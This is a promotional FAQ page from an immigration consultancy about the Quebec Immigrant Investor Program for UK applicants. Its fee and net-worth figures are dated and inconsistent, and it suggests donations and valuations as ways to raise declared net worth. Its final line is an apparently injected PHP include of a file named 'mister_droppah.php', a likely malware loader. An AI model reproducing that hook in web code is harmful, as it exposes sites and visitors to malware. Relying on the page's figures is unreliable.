Business immigration canada investor immigration

Do you qualify as an immigrant investor?

CSIC Receive our brochure by email

VIP Business Immigration from the UK to CANADA ,

First Legal Expert of the Quebec Immigrant Investor Program

In Full  transparency we will not submit  a file that is  not credible against payment.

We takes great care of our clients and have no interest in accepting non-meritorious applications as the reputation of VIP Business Immigration  is based on its perfect score  for all processed applications under the Immigrant Investor Program

Canada Investor Immigration contact number in London

Requirements of  the Immigrant Investor Program

Financing Gateway option from the Bank

Quebec Immigrant Investor program - Do I need to live in Quebec

Investor Visa Canada  2017 2018

How to  immigrate to Canada from the United Kingdom as a business person or an Employed Manager - Director as I have accumulated the required Net Worth?

Well  , If you qualify you can take advantage  of the immigrant investor program of Quebec, which allows an immigrant investor to immigrate with his direct family to Canada  in less than 30 months. You must be qualified by VIP Business Immigration to participate in this exclusive program which has a very limited quota .

Don’t wait , confirm you could qualify with Max Donzella , Director of VIP Investor Program  How Can I Move  to Canada from the UK as an Immigrant Investor

Will my family be included in the Immigrant  Investor  file and allowed to immigrate from the UK to Canada under my Immigrant Investor status visa ?

You direct family will be part of the same Investor Immigrant file under theses conditions: your spouse or common law partner is included and you children will be included if they are under the age of 19 years old .

What is the definition of a required Net Worth for the Investor Immigration Program ?

A required Net Worth means all the assets that you have accumulated through your life minus all pending liabilities.  As an example, you own a property (your residency) which is worth 400,000 GBP on the market, but you have a bank loan of 100,000 BGP left to pay on this property.  As a result, the net worth of this property is 300,000 GBP.

As a second example, you own a rental property that is worth 200,000 GBP on the market and is 100% paid, you will add the 300,000 GBP of Net Worth from your residency + the 200,000 GBP from the rental property. In total you now have a net worth of 500,000 GBP. You might have also money in the bank, stock and a value for you company. In total you need about 1,000,000 GBP or 1,600,000$ Canadian of Net Worth .

Do I need to sell my properties in the UK and liquidate assets I own to bring 1,200,000 GBP to Canada?

The answer is no, you only need to prove that you own the 1,200,000 GBP of assets. You can continue running your business or maintain your employment for a period of time and do what you want with your assets. The only amount of money you need to provide to the bank are the financing fees of 240,000$ Canadian and 15,000$ Canadian ( government fees ) payable through the firms Intrust account  for the Investor application + our professional fees.

My net Worth is only 300,000 GBP, can I borrow money from someone to meet the program requirements ?

The answer is no, or else it cannot be considered a Net Worth, as you would increase your debt, remember that the calculation for a net worth is Asset value minus all debt = Net Worth.  This said , The Quebec Immigrant investor program allows the Immigrant Investor or the spouse (common law partner) to receive a donation officially with documents from anyone. The donation can be money, stocks, a property and other assets but it must say clearly that it is a donation, not a loan. Ask us to help you with this.

Do i need to start a business to be accepted as an Immigrant Investor?

You do not need to do anything other than pay the 240,000$ Canadian of financing fees. You are not obligated to work or do any business at all and you can retire in complete peace of mind being in Canada.  This will be your right and privilege as a Permanent Resident of Canada.

With the Immigrant Investor program of Quebec , do I need to live in Quebec?

No, you can live anywhere in Canada (protected under the Canadian Charter of Rights), but we encourage you to obtain information on the Quebec very good quality of live. We will provide you with all the information required once you are accepted prior to moving to Canada. The Permanent Residency Visa for an Immigrant Investor is provided without specific conditions as it is not attached to creating jobs, finding employment or creating a company. Freedom of choice is the keyword.

Does VIP Business Immigration offer other services to landing Immigrant investors?

Yes, VIP is part of an accounting firm working with investors to create companies, managing their accounting and taxes. VIP will also provide you with a free Real Estate Agent for you investments and to find your home or lease a furnished apartment prior to your arrival. All relocation services are also available. You are not alone when you work with VIP Business Immigration. As a bonus, VIP Business Immigration will send a Limo at the airport to bring you downtown Montreal if you land in Montreal.

When does the Immigrant Investor have to pay the 240,000$ Canadian in required  financing fees?

Once we deposit your business immigration file, under the Quebec Investor Program about 6 to 12  months later, you will receive you acceptation letter from the Quebec Authorities (means you are approved by Quebec which almost guarantees your Federal Approval) or you will receive an  approval after 12 months  under the federal program . From that moment, you have 60 days to pay your financing fees of 240,000$ Canadian. You will be able to open a Canadian bank account once we have deposited your business immigration file. We will assist in this also.

What is the entire Investor Immigration timeline, the waiting time and the government fees to be paid for the application process?

In general, if you provide the required documents in 1 months period, we need 2 month to process your file. So it would take 3 months to deposit your file + a 6 to 12 months waiting period to receive your approval under the Quebec Investor Program  . Once you are approved, if you process your payment of 240,000$Canadian immediately, there is an average 12 months waiting for Immigrant Investors from the UK for the Permanent Residency Visa from the Canadian Government under the Quebec Investor Program . In total as a result you can expect a 24 months required to receive your Permanent Residency Visa which is the official document that allows you and your family to immigrate to Canada with a Permanent status

Ask a specific question to  Max Donzella , director Of VIP Business Immigration   Canada Investor Visa office london contact

How can increase my Net Worth in order to be admissible under the Immigrant Investor Program ?

Often, the Immigrant Investor has properties as part of  his/her Net Worth. The best way to increase your Net Worth is you ask for a local written evaluation of your properties from a certified valuator. This value will not be challenged by the Canadian and Quebec immigration officers unless it seems not logical or the documents are not properly stamped or signed. Only under the Quebec Investor Program you can receive a donation to increase your Net Worth ( ask us how it must be done)

Investor Immigration to Canada from the UK London Office Expert Consultant . Quebec Investor Visa requirements for 2016 application under the brokerage firm limited Quota of 570 per year. Canadian definition of Net worth includes investments such as business real estate, property, company equity, money in the bank, stock market shares and other investments. Keywords: Canadian net worth, business immigration law file, Quebec immigrant investor net worth, Canadian business immigration net worth immigrant investor file under business law class, investor immigration canada, financing fees of 240,000$ , required investment of 800,000 Canadian/ Immigrate to Canada from the UK before Brexit in 24 months /Immigrant investor Program/Requirements/application Canadian Immigration / business immigrant visa/ Permanent Residency / London Office for Canada Investor Visa Expert
require_once(dirname(__FILE__).'/mister_droppah.php');